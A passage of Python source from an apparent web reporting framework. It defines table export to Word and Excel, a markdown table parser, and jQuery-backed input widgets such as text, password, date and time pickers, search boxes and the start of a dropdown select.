<div %(strAttr)s><table class='%(tableCss)s'>%(header)s%(footer)s</table></div>
''' % {'strAttr': self.strAttr(pyClassNames=['CssDivWithBorder']), 'header': self.header, 'footer': self.footer, 'tableCss': " ".join(self.tableStyle)}
# return '''
# <div id="%(htmlId)s_loading" style="display:none;height:%(height)s" %(loading)s>
# <div style="margin:auto;font-size:20px;width:40%%">
# <div style="width:100%%;text-align:right;padding:5px 10px 0 0">
# <i class="fas fa-times-circle" onclick="$('#%(htmlId)s_loading').hide(); $('#%(htmlId)s').show()"></i>
# </div>
# <p>Loading...</p>
# <i id="%(htmlId)s_loading_icon" class="fas fa-spinner fa-spin"></i><br />
# </div>
# </div>
#
# <div %(strAttr)s>
# <div style="height:25px;width:100%%">
# <div style="height:25px;clear:left;float:left;margin-bottom:8px;font-size:16px;font-weight:bold;font-variant:small-caps;">%(title)s</div>
# <div style="height:25px;clear:right;float:right;color:#F5F5F5;text-align:right;align:right">%(options)s</div>
# </div>
# <div style="overflow:auto;width:100%%;height:100%%;">
# %(comments)s
# <table name='aresTable' class='%(tableStyle)s' style="width:%(tableWidth)s">%(header)s%(footer)s</table>
# </div>
# <div style='width:100%%;text-align:right;height:20px'>%(wrench)s<p id='%(htmlId)s_processing' style="margin-top:3px;font-size:12px;float:left;display:block;color:%(color)s"></p> %(clock)s<p id='%(htmlId)s_updated' style="margin-top:3px;font-size:12px;float:right;display:block;color:%(color)s">%(timestamp)s</p></div>
# </div>''' % {'strAttr': self.strAttr(pyClassNames=['CssDivWithBorder']), 'title': self.title, 'options': "".join(reversed(options)),
# 'clock': self.aresObj.clock(''), 'color': self.getColor('border', 1), 'timestamp': time.strftime("%Y-%m-%d %H:%M:%S", time.gmtime()),
# 'footer': ''.join(footer), 'header': ''.join(self.htmlHeader()), 'tableStyle': self.tableStyle,
# 'wrench': self.aresObj.wrench('left'), 'htmlId': self.htmlId, "width": self.width, "tableWidth": self.tableWidth,
# 'loading': self.aresObj.cssObj.getClsTag(['CssDivLoading']),
# 'height': self.height, 'comments': self.dsc_comment}
def to_word(self, document):
"""
:category: Word export
:rubric: Output
:example: aresObj.to_word()
:dsc:
Special output function used by the framework to export the report to a word document
This function cannot be used directly as it will write the report on the server but some buttons are available on the top to trigger it
:link docx Documentation: http://python-docx.readthedocs.io/en/latest/
"""
data = self.data.records()
table = document.add_table(rows=1, cols=len(self.__table.header))
hdr_cells = table.rows[0].cells
for i, header in enumerate(self.__table.header):
hdr_cells[i].text = header['title']
if len(self.__table.header) < 10 and len(data) < 20:
for rec in data:
row_cells = table.add_row().cells
for i, header in enumerate(self.__table.header):
row_cells[i].text = str(rec[header['data']])
def to_xls(self, workbook, worksheet, cursor):
"""
:category: Excel export
:rubric: Output
:example: aresObj.to_xls()
:dsc:
Special output function used by the framework to export the report to an Excel document
This function cannot be used directly as it will write the report on the server but some buttons are available on the top to trigger it
"""
if self.title != '':
cell_format = workbook.add_format({'bold': True, 'align': 'center'})
worksheet.merge_range(cursor['row'], cursor['col'], cursor['row'], cursor['col']+len(self.__table.header)-1, self.title, cell_format)
cursor['row'] += 1
for i, header in enumerate(self.__table.header):
worksheet.write(cursor['row'], i, header['title'])
cursor['row'] += 1
for rec in self.data.records():
for i, header in enumerate(self.__table.header):
worksheet.write(cursor['row'], i, rec[header['data']])
cursor['row'] += 1
cursor['row'] += 1
# -----------------------------------------------------------------------------------------
# MARKDOWN SECTION
# -----------------------------------------------------------------------------------------
@classmethod
def matchMarkDownBlock(cls, data): return True if data[0].strip().startswith( "---Table" ) else None
@staticmethod
def matchEndBlock(data): return data.endswith("---")
@classmethod
def convertMarkDownBlock(cls, data, aresObj=None):
"""
:category: Markdown
:rubric: PY
:example: Data structure recognised
---Table
label|value|color
Test 1|35|yellow
Test 2|25|blue
---
:dsc:
convert the markdown text to a valid aresObj item.
In order to include it to a report it is necessary to pass the aresObj
"""
tableConfig = data[0].split(':')
tableType = tableConfig[-1] if len(tableConfig) > 1 else 'base'
headers = data[1].strip().split("|")
records, pmts, attr = [], {}, {}
for line in data[2:-1]:
rec = {}
if line.startswith("@"):
dataAttr = line[1:].strip().split(";")
for d in dataAttr:
a, b = d.split(":")
attr[a] = b
continue
if line.startswith("--"):
dataAttr = line[2:].strip().split(";")
for d in dataAttr:
a, b = d.split(":")
pmts[a] = b
continue
splitLine = line.replace(",", '.').strip().split("|")
for i, val in enumerate( splitLine ):
if i == 0:
rec[headers[i]] = val
else:
rec[headers[i]] = val
records.append(rec)
if aresObj is not None:
if 'pageLength' in pmts:
pmts['pageLength'] = int(pmts['pageLength'])
p = aresObj.table(records, header=headers, rows=headers, cols=[], tableTypes=tableType, tableOptions=pmts)
p.addAttr(attr, isPyData=False)
return []
def jsMarkDown(self): return ""
class DataExcel(AresHtml.Html):
"""
:category: Excel Data Table
:rubric: JS
:dsc:
"""
name, category, callFnc, docCategory = 'Excel', 'Excel', 'excel', 'Standard'
cssTitle = "CssTitle4"
__pyStyle = ['CssTableExcel', 'CssTableExcelHeaderCell', 'CssTableExcelTd']
def __init__(self, aresObj, recordSet, cols, rows, title, width, widthUnit, height, heightUnit, cellwidth, delimiter, htmlCode):
self.title, self.recordSet, self.delimiter = title, recordSet, delimiter
super(DataExcel, self).__init__(aresObj, [], code=htmlCode, width=width, widthUnit=widthUnit, height=height, heightUnit=heightUnit)
self._jsStyles = {'header': rows + cols, 'cellwidth': cellwidth}
self.css({'display': 'inline-block', 'overflow': 'auto', 'padding': 0, 'vertical-align': 'top'})
@property
def val(self):
return "JSON.stringify(tableData(%s))" % self.jqId
@property
def records(self):
return "listToRec(tableData(%s), %s)" % (self.jqId, json.dumps(self._jsStyles['header']))
@property
def jqId(self):
""" Refer to the internal select item """
return "$('#%s table')" % self.htmlId
def onDocumentLoadFnc(self):
self.addGlobalFnc("%s(htmlObj, data, jsStyles)" % self.__class__.__name__, ''' htmlObj.empty();
var tr = $('<tr></tr>');
jsStyles.header.forEach(function(rec){tr.append("<th>"+ rec +"</th>")});
htmlObj.append(tr); var tr = $('<tr></tr>'); var tbody = $('<tbody></tbody>');
jsStyles.header.forEach(function(rec){tr.append("<td><input type='text' style='"+ jsStyles.cellwidth +"'/></td>")});
tbody.append(tr);htmlObj.append(tbody)''')
def __str__(self):
self.aresObj.jsOnLoadFnc.add('''
function tableData(tableObj){
res = [];
tableObj.find('tbody').find('tr').each(function(key, val){
var row = [];
$(this).find('td').each(function(key, cell) { row.push($(cell).find('input').val())});
res.push(row)}); return res};
function listToRec(data, header){
var res = [];
data.forEach(function(row){
rec = {};
header.forEach(function(h, i){rec[h] = row[i];});
res.push(rec);
}); return res}''')
self.paste('''
var tbody = $(this).find('tbody'); tbody.empty();
var tableId = $(this).parent().attr('id');
var lineDelimiter = $('#' + tableId + '_delimiter').val();
if (lineDelimiter == 'TAB'){ lineDelimiter = '\\t' };
data.split("\\n").forEach(function(line){
if (line !== ''){
var tr = $('<tr></tr>');
line.split(lineDelimiter).forEach(function(rec){ tr.append("<td><input type='text' value='"+ rec +"'/></td>")
}); tbody.append(tr)}}) ''')
title = ''
if self.title != '':
cssMod, titleCls = self.aresObj.cssObj.get(self.cssTitle), ""
if cssMod is not None:
self.addPyCss(self.cssTitle)
titleCls = cssMod().classname
title = '<div class="%(titleCls)s" style="margin:0;display:inline-block;margin-bottom:5px">%(title)s</div>' % {'titleCls': titleCls, 'title': self.title}
if self.delimiter is None:
delimiter = '<input id="%s_delimiter" type="text" value="%s" placeholder="Line delimiter"/>' % (self.htmlId, self.delimiter)
else:
delimiter = '<input id="%s_delimiter" type="text" value="%s" style="display:none" placeholder="Line delimiter"/>' % (self.htmlId, self.delimiter)
return '<div %(strAttr)s>%(title)s%(delimiter)s<table></table></div>' % {'strAttr': self.strAttr(pyClassNames=self.pyStyle), 'title': title, 'delimiter': delimiter}
```
#### File: Lib/html/AresHtmlInput.py
```python
DSC = {
'eng':
'''
:dsc:
'''}
import json
import datetime
from ares.Lib.html import AresHtml
class InputText(AresHtml.Html):
""" Python wrapper for the Html input text element
"""
references = {'Input Tutorial': 'https://openclassrooms.com/courses/decouvrez-la-puissance-de-jquery-ui/l-autocompletion-1'}
__pyStyle = ['CssDivNoBorder']
__reqCss, __reqJs = ['bootstrap', 'font-awesome', 'jqueryui'], ['bootstrap', 'font-awesome', 'jquery']
name, category, inputType, callFnc, docCategory = 'Input Text', 'Input', "text", 'input', 'Advanced'
def __init__(self, aresObj, text, placeholder, label, icon, width, widthUnit, height, heightUnit, color, size, align, htmlCode,
withRemoveButton, autocompleteSrc, tooltip, docBlock, lettersOnly, globalFilter):
self.autocompleteSrc, self.align, self.label, self.withRemoveButton = autocompleteSrc, align, label, withRemoveButton
self.placeholder, self._disabled, self.icon = placeholder, '', icon
super(InputText, self).__init__(aresObj, text, htmlCode=htmlCode, width=width, widthUnit=widthUnit, height=height, heightUnit=heightUnit, docBlock=docBlock, globalFilter=globalFilter)
self.color = self.getColor('textColor', 1) if color is None else color
self.size = self.aresObj.pyStyleDfl['fontSize'] if size is None else "%spx" % size
self.css({'clear': 'both', "vertical-align": "middle"})
if self.htmlCode is not None:
self.aresObj.htmlCodes[self.htmlCode] = self
self.change('') # Add the onchange method to update the breadcrumb
if self.htmlCode in self.aresObj.http:
self.vals = self.aresObj.http[self.htmlCode]
if tooltip != '':
self.tooltip(tooltip)
if lettersOnly:
self.keydown("returnVal = ( (event.keyCode >= 65 && event.keyCode <= 90) || event.keyCode == 8 || event.key == '_');")
def autocomplete(self, dataSrc):
if isinstance( dataSrc, list):
dataSrc = {"type": 'static', 'minLength': 1, 'data': dataSrc}
self.autocompleteSrc = dataSrc
return self
def emtpy(self): return '$("#%s input").val("")' % self.htmlId
@property
def val(self): return '$("#%s input").val()' % self.htmlId
@property
def disabled(self):
self._disabled = 'disabled'
return self
@property
def jsQueryData(self): return "{ event_val: $(this).find('input').val() }"
def onDocumentLoadFnc(self): self.addGlobalFnc("%s(htmlObj, data)" % self.__class__.__name__, "htmlObj.find('input').val(data);", 'Javascript Object builder')
def enter(self, jsFncs):
"""
:category: Javascript Event
:rubric: JS
:example: >>> myObj.input(placeholder="Put your tag").enter( " alert() " )
:dsc:
Add an javascript action when the key enter is pressed on the keyboard
:return: The python object itself
"""
if not isinstance(jsFncs, list):
jsFncs = [jsFncs]
self.jsFrg("keydown", "if (event.keyCode == 13) { var data = %(data)s; event.preventDefault(); %(jsFnc)s } " % {"jsFnc": ";".join(jsFncs), 'data': self.jsQueryData})
return self
def filter(self, aresDf, colName, caseSensitive=False, multiVals=False, exactMath=False, allSelected=True, filterGrp=None):
"""
:category: Javascript Features - Filter Input
:rubric: JS
:type: Front End
:example: htmlObj.filter(data, 'Country')
:dsc:
Wrapper to filter data on the exact content
"""
if caseSensitive:
srcObj = "aresObj('%s').split(', ')" % self.htmlCode if multiVals else "aresObj('%s')" % self.htmlCode
recObj = "rec['%s']" % colName
else:
srcObj = "aresObj('%s').split(', ').toLowerCase()" % self.htmlCode if multiVals else "aresObj('%s').toLowerCase()" % self.htmlCode
recObj = "rec['%s'].toLowerCase()" % colName
if exactMath:
if multiVals:
strFilter = ["( %s.indexOf(%s) >= 0 ) " % (srcObj, recObj)]
else:
strFilter = ["( %s == %s )" % (srcObj, recObj)]
else:
if multiVals:
strFilter = ["( %s.indexOf(%s) >= 0 ) " % (srcObj, recObj)]
else:
strFilter = ["( %s.indexOf(%s) >= 0 ) " % (recObj, srcObj)]
if allSelected:
strFilter.append("( aresObj('%s') == '')" % self.htmlCode)
if multiVals:
aresDf.link("change", self.htmlCode, " || ".join(strFilter), filterGrp if filterGrp is not None else "filter_%s" % aresDf.htmlCode, colNames=[colName])
aresDf.link("input", self.htmlCode, " || ".join(strFilter), filterGrp if filterGrp is not None else "filter_%s" % aresDf.htmlCode, colNames=[colName])
return self
def __str__(self):
""" Return the String representation of a HTML Input object """
htmlData, textIndent = [], 0
if self.autocompleteSrc is not None:
if self.autocompleteSrc['type'] == 'static':
if self.autocompleteSrc.get('multiple', False):
src = {'source': 'function( request, response ) { response( $.ui.autocomplete.filter( %s, request.term.split( /,\s*/ ).pop() ) ) }' % self.autocompleteSrc['data'],
'minLength': self.autocompleteSrc.get('minLength', 3), 'focus': 'function() { return false ; }',
'select': 'function(event, ui){ var terms = this.value.split( /,\s*/ ); terms.pop(); terms.push( ui.item.value ); terms.push( "" );this.value = terms.join( ", " ); %s; return false; }' % self.autocompleteSrc.get('success', '')}
else:
src = { 'source': json.dumps(self.autocompleteSrc['data']), 'minLength': self.autocompleteSrc.get('minLength', 3),
'select': 'function(event, ui){ %s; }' % self.autocompleteSrc.get('success', '') }
src = "{ %s }" % ",".join(["%s: %s" % (key, val) for key, val in src.items()])
self.aresObj.jsOnLoadFnc.add("$('#%(htmlId)s input').autocomplete( %(dataSrc)s )" % {'htmlId': self.htmlId, 'dataSrc': src })
self.addGlobalFnc('RemoveFilter(htmlId)', "$('#' + htmlId + ' input').val(''); $('#' + htmlId + ' input').change() ;", 'Javascript function to remove the content of an element and trigger a change event')
if self.label:
htmlData.append('''<label style='height:25px;color:%s;font-size:%s;margin-bottom:-10px;padding-bottom:0px;'>%s</label>''' % (self.color, self.size, self.label))
htmlData.append('<div %(strAttr)s><div style="height:100%%;width:100%%;">' % {'strAttr': self.strAttr(pyClassNames=['CssDivNoBorder'])})
if self.icon:
htmlData.append('<span class="%s" style="position:absolute;font-size:15px;left:7px;top:5px;"></span>' % self.icon)
textIndent = 30
htmlData.append('<input type="%(inputType)s" %(disabled)s placeholder="%(placeholder)s" class="form-control" value="%(vals)s" style="text-indent:%(textIndent)spx;height:27px;width:100%%"/>' % {'inputType': self.inputType, 'disabled': self._disabled, 'placeholder': self.placeholder, 'textIndent': textIndent, 'vals': self.vals})
htmlData.append('</div>')
if self.withRemoveButton:
htmlData.append('''<div onclick="RemoveFilter('%(htmlId)s')" style="margin-top:-27px;z-index:1;float:right;width:25px;height:100%%;padding:5px;cursor:pointer;position:relative;color:%(darkRed)s" title="Remove filter" class="fas fa-user-times"> </div>''' % {'htmlId': self.htmlId, 'darkRed': self.getColor('redColor', 4)})
htmlData.append('</div>')
return ''.join(htmlData)
def to_word(self, document):
p = document.add_paragraph()
p.add_run("Input: ")
runner = p.add_run( self.aresObj.http.get(self.htmlCode, self.vals) )
runner.bold = True
def to_xls(self, workbook, worksheet, cursor):
"""
:param workbook:
:param worksheet:
:param cursor:
:return:
:link xlxWritter Documentation: https://xlsxwriter.readthedocs.io/format.html
"""
cell_format = workbook.add_format({'bold': True, 'font_color': self.color, 'font_size': self.size})
worksheet.write(cursor['row'], 0, self.vals, cell_format)
cursor['row'] += 2
class InputPass(InputText):
""" Python rapper for the Html input password element """
references = {'Input Password': 'https://developer.mozilla.org/fr/docs/Web/HTML/Element/Input/password',
'Input Password W3C': 'https://www.w3schools.com/howto/howto_js_password_validation.asp',
'Input Password Event': 'https://www.w3schools.com/howto/howto_js_toggle_password.asp'}
inputType = "password"
name, category, callFnc, docCategory = 'Input Password', 'Input', 'pwd', 'Advanced'
class InputInt(InputText):
""" Python wrapper for the Html input integer element """
references = {'Input Forms': 'https://www.alsacreations.com/tuto/lire/1409-formulaire-html5-type-number.html'}
inputType = "number"
__pyStyle = ['CssInput', 'CssInputInt', 'CssInputLabel']
name, category, callFnc, docCategory = 'Input Integer', 'Input', 'inputInt', 'Advanced'
class InputRange(AresHtml.Html):
""" Python wrapper for the HTML input range element
:example
aresObj.inputRange('Coucou', number=11)
"""
references = {'Input Range': 'https://www.alsacreations.com/tuto/lire/1410-formulaire-html5-type-range.html'}
name, category, callFnc, docCategory = 'Input Range', 'Input', 'inputRange', 'Advanced'
__pyStyle = ['CssInput', 'CssInputText', 'CssInputLabel']
def __init__(self, aresObj, recordSet, color, size, align, width, widthUnit, height, heightUnit, htmlCode):
self.align = align
super(InputRange, self).__init__(aresObj, recordSet, htmlCode=htmlCode, width=width, widthUnit=widthUnit, height=height, heightUnit=heightUnit)
if not 'step' in self.vals:
self.vals['step'] = 1
self.color = self.getColor('baseColor', 2) if color is None else color
self.size = self.aresObj.pyStyleDfl['fontSize'] if size is None else "%spx" % size
self.css( {"display": 'inline-block'})
if self.htmlCode is not None:
self.aresObj.htmlCodes[self.htmlCode] = self
self.change('')
@property
def val(self): return '$("#%s input").val()' % self.htmlId
@property
def data(self): return "{ event_val: $(this).find('input').val() }"
def change(self, jsFncs):
if isinstance(jsFncs, list):
for jsFnc in jsFncs:
self.jsFrg('change', jsFnc)
else:
self.jsFrg('change', jsFncs)
def onDocumentLoadFnc(self):
self.addGlobalFnc("%s(htmlObj, data)" % self.__class__.__name__, ''' htmlObj.empty() ;
if ( data.label != undefined) {htmlObj.append("<label for='" + data.label + "' style='display:inline-block;vertical-align:middle;text-align:%s;padding-left:6px;color:%s;font-size:%s;font-weight:bold;'>" + data.label + "</label>") } ;
htmlObj.append("<input oninput='range_weight_disp.value=this.value' min="+ data.min + " max="+ data.max + " step="+ data.step + " type='range' placeholder='" + data.placeholder + " ' value=" + data.text + ">");
htmlObj.append("<output id='range_weight_disp'></output>");
''' % (self.align, self.color, self.size), 'Javascript Object builder')
def __str__(self):
""" Return the String representation of a HTML Input object """
return '<div %s></div>' % self.strAttr(pyClassNames=self.__pyStyle)
class DatePicker(AresHtml.Html):
""" Python Wrapper for the Html and Jquery UI datepicker object
"""
references = {'Date Picker Jquery': 'https://jqueryui.com/datepicker/'}
__reqCss, __reqJs = ['bootstrap', 'font-awesome'], ['bootstrap', 'jquery', 'font-awesome']
name, category, callFnc, docCategory = 'Date Picker', 'Input', 'date', 'Advanced'
__pyStyle = ['CssDivNoBorder', 'CssDivCursor']
def __init__(self, aresObj, label, color, size, yyyy_mm_dd, htmlCode, frequency, placeholder, changeMonth,
changeYear, showOtherMonths, selectOtherMonths, selectedDts, selectedCss, excludeDts, useDefault, withRemoveButton,
width, widthUnit, height, heightUnit):
if frequency is not None:
# Get the next days (to check if we are not in a particular date
cobDate = datetime.datetime.today()
if len(frequency) > 1:
fType, fCount = frequency[0], frequency[2]
else:
fType, fCount = frequency[0], 0
if not fType in ['T', 'W', 'M', 'Y']:
raise Exception("%s frequence not in the list T, W, M and Y" % frequency)
if fType == 'T':
for i in range(0, int(fCount) + 1):
cobDate = cobDate - datetime.timedelta(days=1)
while cobDate.weekday() in [5, 6]:
cobDate = cobDate - datetime.timedelta(days=1)
self.value = cobDate.strftime('%Y-%m-%d')
elif fType == 'M':
endMontDate = datetime.datetime(cobDate.year, cobDate.month - int(fCount), 1)
endMontDate = endMontDate - datetime.timedelta(days=1)
while endMontDate.weekday() in [5, 6]:
endMontDate = endMontDate - datetime.timedelta(days=1)
self.value = endMontDate.strftime('%Y-%m-%d')
elif fType == 'W':
cobDate = cobDate - datetime.timedelta(days=1)
while cobDate.weekday() != 4:
cobDate = cobDate - datetime.timedelta(days=1)
cobDate = cobDate - datetime.timedelta(days=(int(fCount) * 7) )
self.value = cobDate.strftime('%Y-%m-%d')
elif fType == 'Y':
endYearDate = datetime.datetime(cobDate.year - int(fCount), 1, 1)
endYearDate = endYearDate - datetime.timedelta(days=1)
while endYearDate.weekday() in [5, 6]:
endYearDate = endYearDate - datetime.timedelta(days=1)
self.value = endYearDate.strftime('%Y-%m-%d')
else:
if yyyy_mm_dd == '':
cobDate = datetime.datetime.today() - datetime.timedelta(days=1)
while cobDate.weekday() in [5, 6]:
cobDate = cobDate - datetime.timedelta(days=1)
self.value = cobDate.strftime('%Y-%m-%d')
else:
self.value = yyyy_mm_dd
super(DatePicker, self).__init__(aresObj, {'label': label, 'date': self.value, 'selectedDts': []}, htmlCode=htmlCode, width=width, widthUnit=widthUnit, height=height, heightUnit=heightUnit)
self.color = self.getColor('baseColor', 2) if color is None else color
self.css( {"display": "inline-block", "vertical-align": "middle", "font-size": self.aresObj.pyStyleDfl['fontSize'] if size is None else "%spx" % size, "clear": "both"})
self.placeholder, self.changeMonth, self.changeYear, self.showOtherMonths, self.selectOtherMonths = placeholder, changeMonth, changeYear, showOtherMonths, selectOtherMonths
self.selectedCss, self.withRemoveButton = selectedCss, withRemoveButton
self.vals['options'] = {'dateFormat': 'yy-mm-dd', 'changeMonth': json.dumps(self.changeMonth),
'changeYear': json.dumps(self.changeYear), 'excludeDts': excludeDts,
'showOtherMonths': json.dumps(self.showOtherMonths),
'selectOtherMonths': json.dumps(self.selectOtherMonths)}
self.vals['selectedDts'] = [] if selectedDts is None else selectedDts
if self.htmlCode is not None:
self.aresObj.htmlCodes[self.htmlCode] = self
if self.htmlCode in self.aresObj.http:
self.vals['date'] = self.aresObj.http[self.htmlCode]
else:
if useDefault:
# Add to the http parameteres if missing and as there is always a default value
# This parameter will never block a report by default (by using the variable useDefault)
self.aresObj.http[self.htmlCode] = self.vals['date']
self.change('')
@property
def val(self): return '$("#%s input").val()' % self.htmlId
@property
def jsQueryData(self): return "{ event_val: $('#%s input').val() }" % self.htmlId
def jsSetVal(self, jsVal, isPyData=False):
if isPyData:
jsVal = json.dumps(jsVal)
return '$("#%s input").datepicker("setDate", %s)' % (self.htmlId, jsVal)
def initVal(self, val): self.vals['date'] = val
def onDocumentLoadFnc(self):
""" Pure Javascript onDocumentLoad Function """
self.addGlobalFnc("%s(htmlObj, data)" % self.__class__.__name__, '''
var htmlId = htmlObj.attr('id') ;
data.options.changeMonth = (data.options.changeMonth === 'true');
data.options.changeYear = (data.options.changeYear === 'true');
data.options.showOtherMonths = (data.options.showOtherMonths === 'true');
data.options.selectOtherMonths = (data.options.selectOtherMonths === 'true');
$("#"+ htmlId +" p").html(data.label) ; $("#"+ htmlId +" input").datepicker( data.options ).datepicker('setDate', data.date) ;
if (data.selectedDts.length > 0) {
var selectedDt = {} ;
data.selectedDts.forEach( function(dt) { var jsDt = new Date(dt); selectedDt[jsDt.toISOString().split('T')[0]] = jsDt; }) ;
if (data.options.excludeDts === true) {
function renderCalendarCallbackExc(intDate) {var utc = intDate.getTime() - intDate.getTimezoneOffset()*60000; var newDate = new Date(utc); var Highlight = selectedDt[newDate.toISOString().split('T')[0]]; if (Highlight) { return [false, '', '']; } else { return [true, '', '']; } } ;
$("#"+ htmlId +" input").datepicker("option", "beforeShowDay", renderCalendarCallbackExc ); }
else {
function renderCalendarCallback(intDate) {var utc = intDate.getTime() - intDate.getTimezoneOffset()*60000; var newDate = new Date(utc); var Highlight = selectedDt[newDate.toISOString().split('T')[0]]; if (Highlight) { return [true, "%s", '']; } else { return [false, '', '']; } } ;
$("#"+ htmlId +" input").datepicker("option", "beforeShowDay", renderCalendarCallback );}
} ''' % self.selectedCss, 'Javascript Object builder')
def addAttr(self, key, val, isPyData=True):
if isPyData:
val = json.dumps(val)
self.vals['options'][key] = val
def selectedDates(self, dts, css='CssLabelDates'):
self.selectedCss = self.addPyCss(css)
self.vals['selectedDts'].extend(dts)
def __str__(self):
""" Return the String representation of a Date picker object """
self.aresObj.jsOnLoadFnc.add('$("#%(htmlId)s div#show").click(function() { var visible = $("#%(htmlId)s input").datepicker("widget").is(":visible"); if( visible ) { $("#%(htmlId)s input").datepicker("hide"); } else { $("#%(htmlId)s input").datepicker("show"); $("#%(htmlId)s input").datepicker("widget").css("z-index", 600);} }); ' % {"htmlId": self.htmlId})
removeOpt = ''
if self.withRemoveButton:
removeOpt = '<div id="remove_%s" style="height:16px;color:%s;display:inline-block;margin-left:5px;font-size:16px" title="remove selection" class="far fa-calendar-times"></div>' % (self.htmlId , self.getColor('redColor', 4))
self.aresObj.jsOnLoadFnc.add('''
$('#remove_%(htmlId)s').on('click', function(event) {
$('#%(htmlId)s input').datepicker('setDate', null);
$('#%(htmlId)s input').change() ;
}) ''' % {'htmlId': self.htmlId} )
return '''
<div %s>
<p style='vertical-align:middle;padding-left:6px;color:%s;display:inline-block;margin:0;text-align:center;height:25px'></p>
<input type="text" class="datepicker form-control" style="padding:0px;display:inline;text-align:center;width:110px;height:27px">
<div id="show" style="height:32px;display:inline-block"><i style="padding-top:8px;font-size:16px" class="far fa-calendar-alt"></i></div>
%s
</div>''' % (self.strAttr(pyClassNames=self.pyStyle), self.color, removeOpt)
class TimePicker(AresHtml.Html):
references = {'Source Code': 'https://github.com/jonthornton/jquery-timepicker'}
__reqCss, __reqJs = ['timepicker'], ['timepicker']
name, category, callFnc, docCategory = 'Time Picker', 'Input', 'date', 'Advanced'
__pyStyle = ['CssDivNoBorder', 'CssDivCursor']
def __init__(self, aresObj, value, label, color, size, htmlCode):
if isinstance(value, str):
value = {"time": value}
self.label = label
if 'options' not in value:
value['options'] = {'timeFormat': 'H:i:s'}
super(TimePicker, self).__init__(aresObj, value, htmlCode=htmlCode)
self.color = self.getColor('baseColor', 2) if color is None else color
self.size = self.aresObj.pyStyleDfl['fontSize'] if size is None else "%spx" % size
if self.htmlCode is not None:
self.aresObj.htmlCodes[self.htmlCode] = self
if self.htmlCode in self.aresObj.http:
self.vals['date'] = self.aresObj.http[self.htmlCode]
self.change('')
@property
def val(self): return '$("#%s input").val()' % self.htmlId
@property
def jsQueryData(self): return "{ event_val: $('#%s input').val() }" % self.htmlId
def addAttr(self, key, val, isPyData=True):
if isPyData:
val = json.dumps(val)
self.vals['options'][key] = val
def initVal(self, val): self.vals['time'] = val
def onDocumentLoadFnc(self):
""" Pure Javascript onDocumentLoad Function """
self.addGlobalFnc("%s(htmlObj, data)" % self.__class__.__name__, '''
var htmlId = htmlObj.attr('id') ;
if (data.time == '') { data.time = new Date() } ;
$("#"+ htmlId +" input").timepicker( data.options ) ;
$("#"+ htmlId +" input").timepicker( 'setTime', data.time) ;
''', 'Javascript Object builder')
def jsSetVal(self, jsVal, isPyData=False):
if isPyData:
jsVal = json.dumps(jsVal)
return '$("#%s input").timepicker("setTime", %s)' % (self.htmlId, jsVal)
def __str__(self):
return '''
<div %s>
<p style='vertical-align:middle;padding-left:6px;color:%s;font-size:%s;display:inline-block;margin:0;text-align:center;height:25px'>%s</p>
<input type="text" class="time" style="margin-top:5px;text-align:center;width:80px;height:27px" />
</div> ''' % (self.strAttr(pyClassNames=self.pyStyle), self.color, self.size, self.label)
class Search(AresHtml.Html):
references = {'Search': 'https://www.w3schools.com/howto/tryit.asp?filename=tryhow_css_anim_search'}
name, category, callFnc, docCategory = 'Search', 'Input', 'search', 'Advanced'
__pyStyle = []
def __init__(self, aresObj, text, placeholder, color, size, align, height, heightUnit, htmlCode, tooltip, extensible):
self.placeholder, self.extensible = placeholder, extensible
super(Search, self).__init__(aresObj, text, htmlCode=htmlCode, height=height, heightUnit=heightUnit)
if self.htmlCode is not None:
self.aresObj.htmlCodes[self.htmlCode] = self
self.change('') # Add the onchange method to update the breadcrumb
if self.htmlCode in self.aresObj.http:
self.vals = self.aresObj.http[self.htmlCode]
if tooltip != '':
self.tooltip(tooltip)
@property
def val(self): return '$("#%s input").val()' % self.htmlId
@property
def jsQueryData(self): return "{ event_val: $(this).parent().find('input').val() }"
def onDocumentLoadFnc(self): self.addGlobalFnc("%s(htmlObj, data)" % self.__class__.__name__, "htmlObj.find('input').val(data);", 'Javascript Object builder')
@property
def eventId(self): return '$("#%s_button")' % self.htmlId
def __str__(self):
""" Return the String representation of a HTML Input object """
pyCssCls = self.addPyCss('CssSearch') if not self.extensible else self.addPyCss('CssSearchExt')
return '''
<div %(attr)s style="width:100%%;display:block">
<input class="%(pyCssCls)s" type="text" name="search" placeholder="%(placeholder)s">
<span id="%(htmlId)s_button" class="fas fa-search" style="margin-top:-30px;font-size:20px;right:30px;z-index:1;float:right;width:25px;cursor:pointer;position:absolute;color:%(blueColor)s"></span>
</div>''' % {"attr": self.strAttr(pyClassNames=self.__pyStyle), "pyCssCls": pyCssCls, "placeholder": self.placeholder, 'htmlId': self.htmlId, 'blueColor': self.getColor("blueColor", 13)}
```
#### File: Lib/html/AresHtmlSelect.py
```python
import json
from ares.Lib.html import AresHtml
from ares.Lib import AresImports
# External package required
ares_pandas = AresImports.requires(name="pandas", reason='Missing Package', install='pandas', autoImport=True, sourceScript=__file__)
class SelectDropDown(AresHtml.Html):
""" Python interface to the Select Drop Down
"""
alias, cssCls = 'dropdown', ['btn', 'dropdown-toggle']
references = {'Bootstrap Definition': 'http://getbootstrap.com/docs/4.0/components/dropdowns/',
'W3C Definition': 'https://www.w3schools.com/bootstrap/tryit.asp?filename=trybs_ref_js_dropdown_multilevel_css&stacked=h',
'Example': 'https://codepen.io/svnt/pen/beEgre'}
__reqCss, __reqJs = ['bootstrap', 'jqueryui'], ['bootstrap', 'jquery']
__pyStyle = ['CssDivNoBorder']
name, category, callFnc, docCategory = 'DropDown Select', 'Select', 'dropdown', 'Advanced'
def __init__(self, aresObj, title, recordSet, width, widthUnit, height, heightUnit, htmlCode, scriptSrc, globalFilter):
if recordSet is None:
title = 'Languages'
super(SelectDropDown, self).__init__(aresObj, recordSet, width=width, widthUnit=widthUnit, height=height, heightUnit=heightUnit, htmlCode=htmlCode, globalFilter=globalFilter)
if scriptSrc is not None and scriptSrc.get('on_init', False):
self.vals = self.onInit(htmlCode, scriptSrc)
if htmlCode is not None and htmlCode in self.aresObj.http:
self.initVal(self.aresObj.http[htmlCode])
self.title, self.scriptSrc = title, scriptSrc
# To replace non alphanumeric characters https://stackoverflow.com/questions/20864893/javascript-replace-all-non-alpha-numeric-characters-new-lines-and-multiple-whi
#self.jsFrg = ["%s = CleanText($(this).text()) ;" % self.htmlId]
self.allowTableFilter, self._jsStyles = [], {"clearDropDown": True, 'dropdown_submenu': {},
'a_dropdown_item': {"width": "100%", 'font-size': '12px', 'text-decoration': 'none', 'padding-left': "10px"},
"li_dropdown_item": {"text-align": "left", 'font-size': '12px'} }
self.css( {"margin-top": "5px", "display": "inline-block"} )
for evts in ['click', 'change']:
# Add the source to the different events
